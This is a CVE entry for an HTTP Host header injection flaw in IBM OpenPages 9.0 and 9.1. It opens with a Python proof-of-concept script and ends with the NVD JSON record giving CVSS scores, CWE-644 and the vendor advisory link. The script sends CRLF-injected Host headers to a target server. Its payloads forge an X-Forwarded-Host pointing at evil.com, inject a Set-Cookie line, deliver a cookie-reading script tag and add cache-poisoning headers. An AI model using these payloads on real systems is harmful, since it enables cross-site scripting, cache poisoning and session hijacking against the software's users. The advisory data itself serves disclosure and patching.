CVE-2025-36223

# CVE-2025-36223 HTTP Header Injection PoC # Target: IBM OpenPages 9.0/9.1 # Attack Type: HOST Header Injection leading to XSS/Cache Poisoning import requests from urllib.parse import quote target_url = "http://target-ibm-openpages-server/" # Malicious HOST header with CRLF injection for XSS malicious_host = "example.com\r\nX-Forwarded-Host: evil.com\r\nSet-Cookie: session=stolen" # Alternative: XSS payload via HOST header injection xss_payload = "<script>alert(document.cookie)</script>" malicious_host_xss = f"example.com\r\nX-Forwarded-Host: {xss_payload}" # Cache poisoning payload cache_poison_payload = "\r\nCache-Control: no-cache\r\nPragma: no-cache" malicious_host_cache = f"example.com{cache_poison_payload}" def test_header_injection(url, malicious_header): headers = { "Host": malicious_header, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } try: response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"[+] Request sent to {url}") print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Headers:") for key, value in response.headers.items(): print(f" {key}: {value}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None # Test the vulnerability print("=" * 60) print("CVE-2025-36223 - IBM OpenPages HTTP Header Injection Test") print("=" * 60) print("\n[1] Testing basic header injection...") test_header_injection(target_url, malicious_host) print("\n[2] Testing XSS via header injection...") test_header_injection(target_url, malicious_host_xss) print("\n[3] Testing cache poisoning...") test_header_injection(target_url, malicious_host_cache)

{"cve": {"id": "CVE-2025-36223", "sourceIdentifier": "[email protected]", "published": "2025-11-12T21:15:49.590", "lastModified": "2025-11-18T19:14:29.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM OpenPages 9.0 and 9.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-644"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8ACBB76-355D-43F6-851E-0B79EE52AC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F78E4CFE-31E7-4FFF-8DB4-6D7AC69A2248"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250239", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}